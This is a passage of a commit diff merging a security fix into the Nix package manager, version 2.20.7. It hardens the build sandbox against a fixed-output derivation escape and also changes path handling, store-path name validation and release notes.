Merge pull request from GHSA-q82p-44mg-mgh5

Fix sandbox escape 2.20

.gitignore

@@ -94,6 +94,7 @@ perl/Makefile.config
 /tests/functional/ca/config.nix
 /tests/functional/dyn-drv/config.nix
 /tests/functional/repl-result-out
+/tests/functional/debugger-test-out
 /tests/functional/test-libstoreconsumer/test-libstoreconsumer
 
 # /tests/functional/lang/

.version

@@ -1 +1 @@
-2.20.0
+2.20.7

Makefile

@@ -47,6 +47,17 @@ makefiles += \
   tests/functional/plugins/local.mk
 endif
 
+# Some makefiles require access to built programs and must be included late.
+makefiles-late =
+
+ifeq ($(ENABLE_DOC_GEN), yes)
+makefiles-late += doc/manual/local.mk
+endif
+
+ifeq ($(ENABLE_INTERNAL_API_DOCS), yes)
+makefiles-late += doc/internal-api/local.mk
+endif
+
 # Miscellaneous global Flags
 
 OPTIMIZE = 1
@@ -95,24 +106,16 @@ installcheck:
 	@exit 1
 endif
 
-# Documentation or else fallback stub rules.
-#
-# The documentation makefiles be included after `mk/lib.mk` so rules
-# refer to variables defined by `mk/lib.mk`. Rules are not "lazy" like
-# variables, unfortunately.
+# Documentation fallback stub rules.
 
-ifeq ($(ENABLE_DOC_GEN), yes)
-$(eval $(call include-sub-makefile, doc/manual/local.mk))
-else
+ifneq ($(ENABLE_DOC_GEN), yes)
 .PHONY: manual-html manpages
 manual-html manpages:
 	@echo "Generated docs are disabled. Configure without '--disable-doc-gen', or avoid calling 'make manpages' and 'make manual-html'."
 	@exit 1
 endif
 
-ifeq ($(ENABLE_INTERNAL_API_DOCS), yes)
-$(eval $(call include-sub-makefile, doc/internal-api/local.mk))
-else
+ifneq ($(ENABLE_INTERNAL_API_DOCS), yes)
 .PHONY: internal-api-html
 internal-api-html:
 	@echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'."

doc/manual/redirects.js

@@ -290,10 +290,10 @@ const redirects = {
     "ssec-gc-roots": "package-management/garbage-collector-roots.html",
     "chap-package-management": "package-management/package-management.html",
     "sec-profiles": "package-management/profiles.html",
-    "ssec-s3-substituter": "package-management/s3-substituter.html",
-    "ssec-s3-substituter-anonymous-reads": "package-management/s3-substituter.html#anonymous-reads-to-your-s3-compatible-binary-cache",
-    "ssec-s3-substituter-authenticated-reads": "package-management/s3-substituter.html#authenticated-reads-to-your-s3-binary-cache",
-    "ssec-s3-substituter-authenticated-writes": "package-management/s3-substituter.html#authenticated-writes-to-your-s3-compatible-binary-cache",
+    "ssec-s3-substituter": "store/types/s3-substituter.html",
+    "ssec-s3-substituter-anonymous-reads": "store/types/s3-substituter.html#anonymous-reads-to-your-s3-compatible-binary-cache",
+    "ssec-s3-substituter-authenticated-reads": "store/types/s3-substituter.html#authenticated-reads-to-your-s3-binary-cache",
+    "ssec-s3-substituter-authenticated-writes": "store/types/s3-substituter.html#authenticated-writes-to-your-s3-compatible-binary-cache",
     "sec-sharing-packages": "package-management/sharing-packages.html",
     "ssec-ssh-substituter": "package-management/ssh-substituter.html",
     "chap-quick-start": "quick-start.html",

doc/manual/rl-next/fod-sandbox-escape.md

@@ -0,0 +1,14 @@
+---
+synopsis: Fix a FOD sandbox escape
+issues:
+prs:
+---
+
+Cooperating Nix derivations could send file descriptors to files in the Nix
+store to each other via Unix domain sockets in the abstract namespace. This
+allowed one derivation to modify the output of the other derivation, after Nix
+has registered the path as "valid" and immutable in the Nix database.
+In particular, this allowed the output of fixed-output derivations to be
+modified from their expected content.
+
+This isn't the case any more.

doc/manual/rl-next/harden-user-sandboxing.md

@@ -0,0 +1,8 @@
+---
+synopsis: Harden the user sandboxing
+significance: significant
+issues:
+prs: <only provided once merged>
+---
+
+The build directory has been hardened against interference with the outside world by nesting it inside another directory owned by (and only readable by) the daemon user.

doc/manual/rl-next/leading-period.md

@@ -0,0 +1,10 @@
+---
+synopsis: Store paths are allowed to start with `.`
+issues: 912
+prs: 9867 9091 9095 9120 9121 9122 9130 9219 9224
+---
+
+Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
+From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
+
+Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).

doc/manual/src/SUMMARY.md.in

@@ -42,7 +42,6 @@
     - [Serving a Nix store via HTTP](package-management/binary-cache-substituter.md)
     - [Copying Closures via SSH](package-management/copy-closure.md)
     - [Serving a Nix store via SSH](package-management/ssh-substituter.md)
-    - [Serving a Nix store via S3](package-management/s3-substituter.md)
   - [Remote Builds](advanced-topics/distributed-builds.md)
   - [Tuning Cores and Jobs](advanced-topics/cores-vs-jobs.md)
   - [Verifying Build Reproducibility](advanced-topics/diff-hook.md)

doc/manual/src/release-notes/rl-2.20.md

@@ -167,3 +167,32 @@
 
          error: expected a set but found an integer
   ```
+
+- Functions are printed with more detail [#7145](https://github.com/NixOS/nix/issues/7145) [#9606](https://github.com/NixOS/nix/pull/9606)
+
+  `nix repl`, `nix eval`, `builtins.trace`, and most other places values are
+  printed will now include function names and source location information:
+
+  ```
+  $ nix repl nixpkgs
+  nix-repl> builtins.map
+  «primop map»
+
+  nix-repl> builtins.map lib.id
+  «partially applied primop map»
+
+  nix-repl> builtins.trace lib.id "my-value"
+  trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5»
+  "my-value"
+  ```
+
+- Flake operations like `nix develop` will no longer fail when run in a Git
+  repository where the `flake.lock` file is `.gitignore`d
+  [#8854](https://github.com/NixOS/nix/issues/8854)
+  [#9324](https://github.com/NixOS/nix/pull/9324)
+
+- `nix copy` to a `ssh-ng` store now needs `--substitute-on-destination` (a.k.a. `-s`)
+  in order to substitute paths on the remote store instead of copying them.
+  The behavior is consistent with `nix copy` to a different kind of remote store.
+  Previously this behavior was controlled by the
+  `builders-use-substitutes` setting and `--substitute-on-destination` was ignored.

flake.nix

@@ -19,7 +19,7 @@
       inherit (import (builtins.fetchTarball { url = "https://github.com/NixOS/nix/archive/1bdcd7fc8a6a40b2e805bad759b36e64e911036b.tar.gz"; sha256 = "sha256:14ljlpdsp4x7h1fkhbmc4bd3vsqnx8zdql4h3037wh09ad6a0893"; }))
         fileset;
 
-      officialRelease = false;
+      officialRelease = true;
 
       # Set to true to build the release notes for the next release.
       buildUnreleasedNotes = false;
@@ -174,7 +174,7 @@
 
           nix =
             let
-              officialRelease = false;
+              officialRelease = true;
               versionSuffix =
                 if officialRelease
                 then ""
@@ -186,7 +186,7 @@
                 stdenv
                 versionSuffix
                 ;
-              officialRelease = false;
+              officialRelease = true;
               boehmgc = final.boehmgc-nix;
               libgit2 = final.libgit2-nix;
               busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell;

mk/lib.mk

@@ -97,6 +97,10 @@ $(foreach test-group, $(install-tests-groups), \
     $(eval $(call run-test,$(test),$(install_test_init))) \
     $(eval $(test-group).test-group: $(test).test)))
 
+# Include makefiles requiring built programs.
+$(foreach mf, $(makefiles-late), $(eval $(call include-sub-makefile,$(mf))))
+
+
 $(foreach file, $(man-pages), $(eval $(call install-data-in, $(file), $(mandir)/man$(patsubst .%,%,$(suffix $(file))))))
 
 

src/libcmd/installable-value.cc

@@ -45,7 +45,7 @@ ref<InstallableValue> InstallableValue::require(ref<Installable> installable)
 std::optional<DerivedPathWithInfo> InstallableValue::trySinglePathToDerivedPaths(Value & v, const PosIdx pos, std::string_view errorCtx)
 {
     if (v.type() == nPath) {
-        auto storePath = fetchToStore(*state->store, v.path());
+        auto storePath = fetchToStore(*state->store, v.path(), FetchMode::Copy);
         return {{
             .path = DerivedPath::Opaque {
                 .path = std::move(storePath),

src/libexpr/eval.cc

@@ -507,13 +507,13 @@ EvalState::~EvalState()
 void EvalState::allowPath(const Path & path)
 {
     if (auto rootFS2 = rootFS.dynamic_pointer_cast<AllowListInputAccessor>())
-        rootFS2->allowPath(CanonPath(path));
+        rootFS2->allowPrefix(CanonPath(path));
 }
 
 void EvalState::allowPath(const StorePath & storePath)
 {
     if (auto rootFS2 = rootFS.dynamic_pointer_cast<AllowListInputAccessor>())
-        rootFS2->allowPath(CanonPath(store->toRealPath(storePath)));
+        rootFS2->allowPrefix(CanonPath(store->toRealPath(storePath)));
 }
 
 void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & v)
@@ -744,7 +744,8 @@ void printEnvBindings(const SymbolTable & st, const StaticEnv & se, const Env &
     if (se.up && env.up) {
         std::cout << "static: ";
         printStaticEnvBindings(st, se);
-        printWithBindings(st, env);
+        if (se.isWith)
+            printWithBindings(st, env);
         std::cout << std::endl;
         printEnvBindings(st, *se.up, *env.up, ++lvl);
     } else {
@@ -756,7 +757,8 @@ void printEnvBindings(const SymbolTable & st, const StaticEnv & se, const Env &
                 std::cout << st[i.first] << " ";
         std::cout << ANSI_NORMAL;
         std::cout << std::endl;
-        printWithBindings(st, env);  // probably nothing there for the top level.
+        if (se.isWith)
+            printWithBindings(st, env);  // probably nothing there for the top level.
         std::cout << std::endl;
 
     }
@@ -778,7 +780,7 @@ void mapStaticEnvBindings(const SymbolTable & st, const StaticEnv & se, const En
     if (env.up && se.up) {
         mapStaticEnvBindings(st, *se.up, *env.up, vm);
 
-        if (!env.values[0]->isThunk()) {
+        if (se.isWith && !env.values[0]->isThunk()) {
             // add 'with' bindings.
             Bindings::iterator j = env.values[0]->attrs->begin();
             while (j != env.values[0]->attrs->end()) {
@@ -2338,7 +2340,14 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat
     auto dstPath = i != srcToStore.end()
         ? i->second
         : [&]() {
-            auto dstPath = fetchToStore(*store, path, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair);
+            auto dstPath = fetchToStore(
+                *store,
+                path.resolveSymlinks(),
+                settings.readOnlyMode ? FetchMode::DryRun : FetchMode::Copy,
+                path.baseName(),
+                FileIngestionMethod::Recursive,
+                nullptr,
+                repair);
             allowPath(dstPath);
             srcToStore.insert_or_assign(path, dstPath);
             printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath));

src/libexpr/flake/lockfile.cc

@@ -107,7 +107,7 @@ LockFile::LockFile(const nlohmann::json & json, const Path & path)
                 std::string inputKey = i.value();
                 auto k = nodeMap.find(inputKey);
                 if (k == nodeMap.end()) {
-                    auto nodes = json["nodes"];
+                    auto & nodes = json["nodes"];
                     auto jsonNode2 = nodes.find(inputKey);
                     if (jsonNode2 == nodes.end())
                         throw Error("lock file references missing node '%s'", inputKey);

src/libexpr/primops.cc

@@ -118,7 +118,7 @@ StringMap EvalState::realiseContext(const NixStringContext & context)
     return res;
 }
 
-static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, bool resolveSymlinks = true)
+static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, std::optional<SymlinkResolution> resolveSymlinks = SymlinkResolution::Full)
 {
     NixStringContext context;
 
@@ -130,7 +130,7 @@ static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, bo
             auto realPath = state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context);
             path = {path.accessor, CanonPath(realPath)};
         }
-        return resolveSymlinks ? path.resolveSymlinks() : path;
+        return resolveSymlinks ? path.resolveSymlinks(*resolveSymlinks) : path;
     } catch (Error & e) {
         e.addTrace(state.positions[pos], "while realising the context of path '%s'", path);
         throw;
@@ -170,7 +170,7 @@ static void mkOutputString(
    argument. */
 static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * vScope, Value & v)
 {
-    auto path = realisePath(state, pos, vPath, false);
+    auto path = realisePath(state, pos, vPath, std::nullopt);
     auto path2 = path.path.abs();
 
     // FIXME
@@ -1534,13 +1534,16 @@ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args,
     try {
         auto & arg = *args[0];
 
-        auto path = realisePath(state, pos, arg);
-
         /* SourcePath doesn't know about trailing slash. */
+        state.forceValue(arg, pos);
         auto mustBeDir = arg.type() == nString
             && (arg.string_view().ends_with("/")
                 || arg.string_view().ends_with("/."));
 
+        auto symlinkResolution =
+            mustBeDir ? SymlinkResolution::Full : SymlinkResolution::Ancestors;
+        auto path = realisePath(state, pos, arg, symlinkResolution);
+
         auto st = path.maybeLstat();
         auto exists = st && (!mustBeDir || st->type == SourceAccessor::tDirectory);
         v.mkBool(exists);
@@ -1777,7 +1780,7 @@ static std::string_view fileTypeToString(InputAccessor::Type type)
 
 static void prim_readFileType(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 {
-    auto path = realisePath(state, pos, *args[0], false);
+    auto path = realisePath(state, pos, *args[0], std::nullopt);
     /* Retrieve the directory entry type and stringize it. */
     v.mkString(fileTypeToString(path.lstat().type));
 }
@@ -2241,7 +2244,14 @@ static void addPath(
             });
 
         if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) {
-            auto dstPath = fetchToStore(*state.store, path, name, method, filter.get(), state.repair);
+            auto dstPath = fetchToStore(
+                *state.store,
+                path.resolveSymlinks(),
+                settings.readOnlyMode ? FetchMode::DryRun : FetchMode::Copy,
+                name,
+                method,
+                filter.get(),
+                state.repair);
             if (expectedHash && expectedStorePath != dstPath)
                 state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path));
             state.allowAndSetStorePathString(dstPath, v);

src/libexpr/primops/context.cc

@@ -144,7 +144,7 @@ static RegisterPrimOp primop_addDrvOutputDependencies({
       The original string context element must not be empty or have multiple elements, and it must not have any other type of element other than a constant or derivation deep element.
       The latter is supported so this function is idempotent.
 
-      This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-addDrvOutputDependencies).
+      This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-unsafeDiscardOutputDependency).
     )",
     .fun = prim_addDrvOutputDependencies
 });
@@ -246,7 +246,7 @@ static RegisterPrimOp primop_getContext({
 
 /* Append the given context to a given string.
 
-   See the commentary above unsafeGetContext for details of the
+   See the commentary above getContext for details of the
    context representation.
 */
 static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * args, Value & v)

src/libfetchers/fetch-to-store.cc

@@ -7,6 +7,7 @@ namespace nix {
 StorePath fetchToStore(
     Store & store,
     const SourcePath & path,
+    FetchMode mode,
     std::string_view name,
     ContentAddressMethod method,
     PathFilter * filter,
@@ -47,18 +48,19 @@ StorePath fetchToStore(
     } else
         debug("source path '%s' is uncacheable", path);
 
-    Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", path));
+    Activity act(*logger, lvlChatty, actUnknown,
+        fmt(mode == FetchMode::DryRun ? "hashing '%s'" : "copying '%s' to the store", path));
 
     auto filter2 = filter ? *filter : defaultPathFilter;
 
     auto storePath =
-        settings.readOnlyMode
+        mode == FetchMode::DryRun
         ? store.computeStorePath(
             name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2).first
         : store.addToStore(
             name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2, repair);
 
-    if (cacheKey)
+    if (cacheKey && mode == FetchMode::Copy)
         fetchers::getCache()->add(store, *cacheKey, {}, storePath, true);
 
     return storePath;

src/libfetchers/fetch-to-store.hh

@@ -8,12 +8,15 @@
 
 namespace nix {
 
+enum struct FetchMode { DryRun, Copy };
+
 /**
  * Copy the `path` to the Nix store.
  */
 StorePath fetchToStore(
     Store & store,
     const SourcePath & path,
+    FetchMode mode,
     std::string_view name = "source",
     ContentAddressMethod method = FileIngestionMethod::Recursive,
     PathFilter * filter = nullptr,

src/libfetchers/fetchers.cc

@@ -376,7 +376,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const
 std::pair<StorePath, Input> InputScheme::fetch(ref<Store> store, const Input & input)
 {
     auto [accessor, input2] = getAccessor(store, input);
-    auto storePath = fetchToStore(*store, SourcePath(accessor), input2.getName());
+    auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, input2.getName());
     return {storePath, input2};
 }
 

src/libfetchers/filtering-input-accessor.cc

@@ -51,33 +51,33 @@ void FilteringInputAccessor::checkAccess(const CanonPath & path)
 
 struct AllowListInputAccessorImpl : AllowListInputAccessor
 {
-    std::set<CanonPath> allowedPaths;
+    std::set<CanonPath> allowedPrefixes;
 
     AllowListInputAccessorImpl(
         ref<InputAccessor> next,
-        std::set<CanonPath> && allowedPaths,
+        std::set<CanonPath> && allowedPrefixes,
         MakeNotAllowedError && makeNotAllowedError)
         : AllowListInputAccessor(SourcePath(next), std::move(makeNotAllowedError))
-        , allowedPaths(std::move(allowedPaths))
+        , allowedPrefixes(std::move(allowedPrefixes))
     { }
 
     bool isAllowed(const CanonPath & path) override
     {
-        return path.isAllowed(allowedPaths);
+        return path.isAllowed(allowedPrefixes);
     }
 
-    void allowPath(CanonPath path) override
+    void allowPrefix(CanonPath prefix) override
     {
-        allowedPaths.insert(std::move(path));
+        allowedPrefixes.insert(std::move(prefix));
     }
 };
 
 ref<AllowListInputAccessor> AllowListInputAccessor::create(
     ref<InputAccessor> next,
-    std::set<CanonPath> && allowedPaths,
+    std::set<CanonPath> && allowedPrefixes,
     MakeNotAllowedError && makeNotAllowedError)
 {
-    return make_ref<AllowListInputAccessorImpl>(next, std::move(allowedPaths), std::move(makeNotAllowedError));
+    return make_ref<AllowListInputAccessorImpl>(next, std::move(allowedPrefixes), std::move(makeNotAllowedError));
 }
 
 bool CachingFilteringInputAccessor::isAllowed(const CanonPath & path)

src/libfetchers/filtering-input-accessor.hh

@@ -54,18 +54,19 @@ struct FilteringInputAccessor : InputAccessor
 };
 
 /**
- * A wrapping `InputAccessor` that checks paths against an allow-list.
+ * A wrapping `InputAccessor` that checks paths against a set of
+ * allowed prefixes.
  */
 struct AllowListInputAccessor : public FilteringInputAccessor
 {
     /**
-     * Grant access to the specified path.
+     * Grant access to the specified prefix.
      */
-    virtual void allowPath(CanonPath path) = 0;
+    virtual void allowPrefix(CanonPath prefix) = 0;
 
     static ref<AllowListInputAccessor> create(
         ref<InputAccessor> next,
-        std::set<CanonPath> && allowedPaths,
+        std::set<CanonPath> && allowedPrefixes,
         MakeNotAllowedError && makeNotAllowedError);
 
     using FilteringInputAccessor::FilteringInputAccessor;

src/libfetchers/git-utils.cc

@@ -2,6 +2,7 @@
 #include "fs-input-accessor.hh"
 #include "input-accessor.hh"
 #include "filtering-input-accessor.hh"
+#include "memory-input-accessor.hh"
 #include "cache.hh"
 #include "finally.hh"
 #include "processes.hh"
@@ -589,7 +590,7 @@ struct GitInputAccessor : InputAccessor
             i = lookupCache.emplace(path, std::move(entry)).first;
         }
 
-        return &*i->second;
+        return i->second.get();
     }
 
     git_tree_entry * need(const CanonPath & path)
@@ -750,17 +751,21 @@ ref<InputAccessor> GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore)
 ref<InputAccessor> GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError)
 {
     auto self = ref<GitRepoImpl>(shared_from_this());
+    /* In case of an empty workdir, return an empty in-memory tree. We
+       cannot use AllowListInputAccessor because it would return an
+       error for the root (and we can't add the root to the allow-list
+       since that would allow access to all its children). */
     ref<InputAccessor> fileAccessor =
-        AllowListInputAccessor::create(
-                makeFSInputAccessor(path),
-                std::set<CanonPath> { wd.files },
-                std::move(makeNotAllowedError));
-    if (exportIgnore) {
+        wd.files.empty()
+        ? makeEmptyInputAccessor()
+        : AllowListInputAccessor::create(
+            makeFSInputAccessor(path),
+            std::set<CanonPath> { wd.files },
+            std::move(makeNotAllowedError)).cast<InputAccessor>();
+    if (exportIgnore)
         return make_ref<GitExportIgnoreInputAccessor>(self, fileAccessor, std::nullopt);
-    }
-    else {
+    else
         return fileAccessor;
-    }
 }
 
 std::vector<std::tuple<GitRepoImpl::Submodule, Hash>> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore)

src/libfetchers/git.cc

@@ -158,6 +158,8 @@ std::vector<PublicKey> getPublicKeys(const Attrs & attrs)
 
 }  // end namespace
 
+static const Hash nullRev{HashAlgorithm::SHA1};
+
 struct GitInputScheme : InputScheme
 {
     std::optional<Input> inputFromURL(const ParsedURL & url, bool requireTree) const override
@@ -634,6 +636,8 @@ struct GitInputScheme : InputScheme
                     attrs.insert_or_assign("ref", submodule.branch);
                 attrs.insert_or_assign("rev", submoduleRev.gitRev());
                 attrs.insert_or_assign("exportIgnore", Explicit<bool>{ exportIgnore });
+                attrs.insert_or_assign("submodules", Explicit<bool>{ true });
+                attrs.insert_or_assign("allRefs", Explicit<bool>{ true });
                 auto submoduleInput = fetchers::Input::fromAttrs(std::move(attrs));
                 auto [submoduleAccessor, submoduleInput2] =
                     submoduleInput.getAccessor(store);
@@ -685,6 +689,9 @@ struct GitInputScheme : InputScheme
                 attrs.insert_or_assign("type", "git");
                 attrs.insert_or_assign("url", submodulePath.abs());
                 attrs.insert_or_assign("exportIgnore", Explicit<bool>{ exportIgnore });
+                attrs.insert_or_assign("submodules", Explicit<bool>{ true });
+                // TODO: fall back to getAccessorFromCommit-like fetch when submodules aren't checked out
+                // attrs.insert_or_assign("allRefs", Explicit<bool>{ true });
 
                 auto submoduleInput = fetchers::Input::fromAttrs(std::move(attrs));
                 auto [submoduleAccessor, submoduleInput2] =
@@ -708,10 +715,12 @@ struct GitInputScheme : InputScheme
             if (auto ref = repo->getWorkdirRef())
                 input.attrs.insert_or_assign("ref", *ref);
 
-            auto rev = repoInfo.workdirInfo.headRev.value();
+            /* Return a rev of 000... if there are no commits yet. */
+            auto rev = repoInfo.workdirInfo.headRev.value_or(nullRev);
 
             input.attrs.insert_or_assign("rev", rev.gitRev());
-            input.attrs.insert_or_assign("revCount", getRevCount(repoInfo, repoInfo.url, rev));
+            input.attrs.insert_or_assign("revCount",
+                rev == nullRev ? 0 : getRevCount(repoInfo, repoInfo.url, rev));
 
             verifyCommit(input, repo);
         } else {

src/libfetchers/github.cc

@@ -109,6 +109,7 @@ struct GitArchiveInputScheme : InputScheme
             "narHash",
             "lastModified",
             "host",
+            "treeHash",
         };
     }
 

src/libfetchers/memory-input-accessor.cc

@@ -20,4 +20,10 @@ ref<MemoryInputAccessor> makeMemoryInputAccessor()
     return make_ref<MemoryInputAccessorImpl>();
 }
 
+ref<InputAccessor> makeEmptyInputAccessor()
+{
+    static auto empty = makeMemoryInputAccessor().cast<InputAccessor>();
+    return empty;
+}
+
 }

src/libfetchers/memory-input-accessor.hh

@@ -13,4 +13,6 @@ struct MemoryInputAccessor : InputAccessor
 
 ref<MemoryInputAccessor> makeMemoryInputAccessor();
 
+ref<InputAccessor> makeEmptyInputAccessor();
+
 }

src/libstore/build/local-derivation-goal.cc

@@ -25,6 +25,7 @@
 #include <regex>
 #include <queue>
 
+#include <sys/stat.h>
 #include <sys/un.h>
 #include <fcntl.h>
 #include <termios.h>
@@ -395,20 +396,30 @@ void LocalDerivationGoal::cleanupPostOutputsRegisteredModeNonCheck()
 static void doBind(const Path & source, const Path & target, bool optional = false) {
     debug("bind mounting '%1%' to '%2%'", source, target);
     struct stat st;
-    if (stat(source.c_str(), &st) == -1) {
+
+    auto bindMount = [&]() {
+        if (mount(source.c_str(), target.c_str(), "", MS_BIND | MS_REC, 0) == -1)
+            throw SysError("bind mount from '%1%' to '%2%' failed", source, target);
+    };
+
+    if (lstat(source.c_str(), &st) == -1) {
         if (optional && errno == ENOENT)
             return;
         else
             throw SysError("getting attributes of path '%1%'", source);
     }
-    if (S_ISDIR(st.st_mode))
+    if (S_ISDIR(st.st_mode)) {
         createDirs(target);
-    else {
+        bindMount();
+    } else if (S_ISLNK(st.st_mode)) {
+        // Symlinks can (apparently) not be bind-mounted, so just copy it
+        createDirs(dirOf(target));
+        copyFile(source, target, /* andDelete */ false);
+    } else {
         createDirs(dirOf(target));
         writeFile(target, "");
+        bindMount();
     }
-    if (mount(source.c_str(), target.c_str(), "", MS_BIND | MS_REC, 0) == -1)
-        throw SysError("bind mount from '%1%' to '%2%' failed", source, target);
 };
 #endif
 
@@ -488,7 +499,13 @@ void LocalDerivationGoal::startBuilder()
     /* Create a temporary directory where the build will take
        place. */
     tmpDir = createTempDir("", "nix-build-" + std::string(drvPath.name()), false, false, 0700);
-
+    if (useChroot) {
+        /* If sandboxing is enabled, put the actual TMPDIR underneath
+           an inaccessible root-owned directory, to prevent outside
+           access. */
+        tmpDir = tmpDir + "/build";
+        createDir(tmpDir, 0700);
+    }
     chownToBuilder(tmpDir);
 
     for (auto & [outputName, status] : initialOutputs) {
@@ -656,15 +673,19 @@ void LocalDerivationGoal::startBuilder()
            environment using bind-mounts.  We put it in the Nix store
            so that the build outputs can be moved efficiently from the
            chroot to their final location. */
-        chrootRootDir = worker.store.Store::toRealPath(drvPath) + ".chroot";
-        deletePath(chrootRootDir);
+        chrootParentDir = worker.store.Store::toRealPath(drvPath) + ".chroot";
+        deletePath(chrootParentDir);
 
         /* Clean up the chroot directory automatically. */
-        autoDelChroot = std::make_shared<AutoDelete>(chrootRootDir);
+        autoDelChroot = std::make_shared<AutoDelete>(chrootParentDir);
 
-        printMsg(lvlChatty, "setting up chroot environment in '%1%'", chrootRootDir);
+        printMsg(lvlChatty, "setting up chroot environment in '%1%'", chrootParentDir);
+
+        if (mkdir(chrootParentDir.c_str(), 0700) == -1)
+            throw SysError("cannot create '%s'", chrootRootDir);
+
+        chrootRootDir = chrootParentDir + "/root";
 
-        // FIXME: make this 0700
         if (mkdir(chrootRootDir.c_str(), buildUser && buildUser->getUIDCount() != 1 ? 0755 : 0750) == -1)
             throw SysError("cannot create '%1%'", chrootRootDir);
 
@@ -2527,6 +2548,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
             [&](const DerivationOutput::CAFixed & dof) {
                 auto & wanted = dof.ca.hash;
 
+                // Replace the output by a fresh copy of itself to make sure
+                // that there's no stale file descriptor pointing to it
+                Path tmpOutput = actualPath + ".tmp";
+                copyFile(actualPath, tmpOutput, true);
+                renameFile(tmpOutput, actualPath);
+
                 auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
                     .method = dof.ca.method,
                     .hashAlgo = wanted.algo,

src/libstore/build/local-derivation-goal.hh

@@ -65,6 +65,16 @@ struct LocalDerivationGoal : public DerivationGoal
      */
     bool useChroot = false;
 
+    /**
+     * The parent directory of `chrootRootDir`. It has permission 700
+     * and is owned by root to ensure other users cannot mess with
+     * `chrootRootDir`.
+     */
+    Path chrootParentDir;
+
+    /**
+     * The root of the chroot environment.
+     */
     Path chrootRootDir;
 
     /**

src/libstore/builtins/fetchurl.cc

@@ -16,6 +16,13 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData)
         writeFile(settings.netrcFile, netrcData, 0600);
     }
 
+    auto out = get(drv.outputs, "out");
+    if (!out)
+        throw Error("'builtin:fetchurl' requires an 'out' output");
+
+    if (!(drv.type().isFixed() || drv.type().isImpure()))
+        throw Error("'builtin:fetchurl' must be a fixed-output or impure derivation");
+
     auto getAttr = [&](const std::string & name) {
         auto i = drv.env.find(name);
         if (i == drv.env.end()) throw Error("attribute '%s' missing", name);
@@ -59,13 +66,12 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData)
     };
 
     /* Try the hashed mirrors first. */
-    if (getAttr("outputHashMode") == "flat")
+    auto dof = std::get_if<DerivationOutput::CAFixed>(&out->raw);
+    if (dof && dof->ca.method.getFileIngestionMethod() == FileIngestionMethod::Flat)
         for (auto hashedMirror : settings.hashedMirrors.get())
             try {
                 if (!hasSuffix(hashedMirror, "/")) hashedMirror += '/';
-                std::optional<HashAlgorithm> ht = parseHashAlgoOpt(getAttr("outputHashAlgo"));
-                Hash h = newHashAllowEmpty(getAttr("outputHash"), ht);
-                fetch(hashedMirror + printHashAlgo(h.algo) + "/" + h.to_string(HashFormat::Base16, false));
+                fetch(hashedMirror + printHashAlgo(dof->ca.hash.algo) + "/" + dof->ca.hash.to_string(HashFormat::Base16, false));
                 return;
             } catch (Error & e) {
                 debug(e.what());

src/libstore/parsed-derivations.cc

@@ -186,7 +186,7 @@ std::optional<nlohmann::json> ParsedDerivation::prepareStructuredAttrs(Store & s
         for (auto i = e->begin(); i != e->end(); ++i) {
             StorePathSet storePaths;
             for (auto & p : *i)
-                storePaths.insert(store.parseStorePath(p.get<std::string>()));
+                storePaths.insert(store.toStorePath(p.get<std::string>()).first);
             json[i.key()] = pathInfoToJSON(store,
                 store.exportReferences(storePaths, inputPaths));
         }

src/libstore/path-regex.hh

@@ -3,6 +3,11 @@
 
 namespace nix {
 
-static constexpr std::string_view nameRegexStr = R"([0-9a-zA-Z\+\-_\?=][0-9a-zA-Z\+\-\._\?=]*)";
+
+static constexpr std::string_view nameRegexStr =
+    // This uses a negative lookahead: (?!\.\.?(-|$))
+    //   - deny ".", "..", or those strings followed by '-'
+    //   - when it's not those, start again at the start of the input and apply the next regex, which is [0-9a-zA-Z\+\-\._\?=]+
+    R"((?!\.\.?(-|$))[0-9a-zA-Z\+\-\._\?=]+)";
 
 }

src/libstore/path.cc

@@ -9,9 +9,20 @@ static void checkName(std::string_view path, std::string_view name)
     if (name.size() > StorePath::MaxPathLen)
         throw BadStorePath("store path '%s' has a name longer than %d characters",
             path, StorePath::MaxPathLen);
-    if (name[0] == '.')
-        throw BadStorePath("store path '%s' starts with illegal character '.'", path);
     // See nameRegexStr for the definition
+    if (name[0] == '.') {
+        // check against "." and "..", followed by end or dash
+        if (name.size() == 1)
+            throw BadStorePath("store path '%s' has invalid name '%s'", path, name);
+        if (name[1] == '-')
+            throw BadStorePath("store path '%s' has invalid name '%s': first dash-separated component must not be '%s'", path, name, ".");
+        if (name[1] == '.') {
+            if (name.size() == 2)
